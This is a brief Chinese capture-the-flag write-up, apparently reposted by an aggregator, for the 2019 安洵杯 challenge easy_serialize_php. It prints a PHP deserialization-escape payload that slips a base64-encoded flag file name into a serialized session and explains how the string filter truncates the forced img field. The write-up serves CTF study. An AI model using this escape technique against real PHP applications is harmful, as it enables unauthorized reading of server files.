刷题记录:[安洵杯 2019]easy_serialize_php

Posted 20175211lyz

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了刷题记录:[安洵杯 2019]easy_serialize_php相关的知识,希望对你有一定的参考价值。

刷题记录:[安洵杯 2019]easy_serialize_php

题目复现链接:https://buuoj.cn/challenges
参考链接:第二届安洵杯2019部分writeup

知识点

PHP反序列化

payload为_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
extract后覆盖了两个没用的属性,但是后面又强制加了一个我们不可控的img属性。这个payload的精妙之处就在于phpflag被替换为空后,$serialize_info的内容为
a:2:{s:7:"";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
刚好把后面多余的img部分截断掉

以上是关于刷题记录:[安洵杯 2019]easy_serialize_php的主要内容,如果未能解决你的问题,请参考以下文章

[安洵杯 2019]easy_serialize_php PHP反序列化逃逸

[安洵杯 2019]easy_serialize_php PHP反序列化逃逸

BUU-MISC-[安洵杯 2019]Attack

[安洵杯 2019]iamthinking

[安洵杯 2019]不是文件上传

2019安洵杯